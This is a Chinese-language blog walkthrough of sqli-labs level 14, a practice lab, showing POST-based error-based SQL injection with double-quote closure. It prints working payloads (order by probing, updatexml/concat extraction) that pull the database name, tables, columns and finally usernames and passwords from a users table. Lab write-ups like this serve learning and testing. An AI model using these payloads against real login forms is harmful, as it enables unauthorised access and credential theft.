sqli-labs关卡14(基于post提交的双引号闭合的报错注入)通关思路

文章目录


前言

此文章只用于学习和反思巩固sql注入知识,禁止用于做非法攻击。注意靶场是可以练习的平台,不能随意去尚未授权的网站做渗透测试!!!


`

一、回顾上一关知识点

上一关是典型的布尔盲注或可以报错盲注。

二、靶场第十四关通关思路

  • 1、判断注入点
  • 2、爆显位
  • 3、爆数据库名
  • 4、爆数据库表
  • 5、爆数据库列
  • 6、爆数据库关键信息

1、判断注入点

老规矩还是使用万能语句1 or 1=1 和 1 or 1=2发现页面正常,所以排除数字型。输入1'发现并没有报错说明可能是和双引号闭合有关,再输入1"发现报错,报错信息为

You have an error in your SQL syntax; check the manual that

corresponds to your MySQL server version for the right syntax to use

near '"1"" and password="" LIMIT 0,1' at line 1

通过报错信息可以知道是双引号闭合。我们构造payload

sql 复制代码
1" or 1=1#
sql 复制代码
1" or 1=2#

发现1=1页面正常,1=2页面异常

细心发现页面正常和异常只会出现提示successfully或failed。就像布尔盲注的ture或false。并没有回显内容。这里明显可以用布尔或者是报错盲注。这里我就用报错注入了,比较简单。

2、爆显位

注入语句为

sql 复制代码
1" order by 3#

发现3报错,说明有2个显位。

3、爆数据库名

注入语句为

sql 复制代码
1" or updatexml(1,concat(0x3a,(select database()),0x3a),1)#

得到数据库名

4、爆数据库表

注入语句为

sql 复制代码
1" or updatexml(1,concat(0x3a,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x3a),1)#

得到关键数据库表名users

5、爆数据库列

注入语句为

sql 复制代码
1" or updatexml(1,concat(0x3a,(select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 1,1),0x3a),1)#
sql 复制代码
1" or updatexml(1,concat(0x3a,(select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 2,1),0x3a),1)#


得到关键数据库列username,password

6、爆数据库关键信息

注入语句为

sql 复制代码
1" or updatexml(1,concat(0x3a,(select password from users limit 0,1),0x3a),1)#
sql 复制代码
1" or updatexml(1,concat(0x3a,(select username from users limit 0,1),0x3a),1)#


得到关键账号密码


总结

这一关用的是报错注入,布尔盲注也适用。如果不懂报错注入流程可以看我的文章第五关解析。此文章是小白自己为了巩固sql注入而写的,大佬路过请多指教!

相关推荐
Devlive 开源社区2 小时前
Nebula 1.6.0 发布:跨区域桶自动路由、秒传、文本/PDF 预览一次到位
数据库·sql
leonshi2 小时前
数据库关联表查询出重复数据的原因分析与解决
sql·重复数据
数据知道3 小时前
网络安全职业规划:从入门到高级安全工程师的路径图
安全·web安全·网络安全·渗透测试·职业规划
Gyr03 小时前
关于证书站捡洞这一档事
安全·web安全
网安蟹佬霸5 小时前
我国网络安全人才缺口现状、成因与对策研究
安全·web安全
chatexcel5 小时前
不用写 SQL,如何用AI直连数据库生成可刷新的数据看板?ChatExcel的一种实践
大数据·数据库·人工智能·sql·数据分析·excel
峥无6 小时前
SQL性能调优:从执行计划看懂索引的使用与失效
数据库·sql
凤山老林6 小时前
ORM 框架性能调优:Spring Boot 下 N+1 查询根因治理、动态 SQL 优化与 Fetch 策略实战
数据库·spring boot·sql
HackTwoHub7 小时前
AntiDebug Mcp、AI逆向绕过前端,Hook 加密接口,抓取 Vue 路由漏洞,接入 MCP 让 AI 自动化挖掘前端漏洞
前端·vue.js·人工智能·安全·web安全·网络安全·系统安全
神秘的MT8 小时前
SQL Server 分页查询 ROW_NUMBER () OFFSET...FETCH游标(Cursor) 数据插入
数据库·sql·学习·c#·winform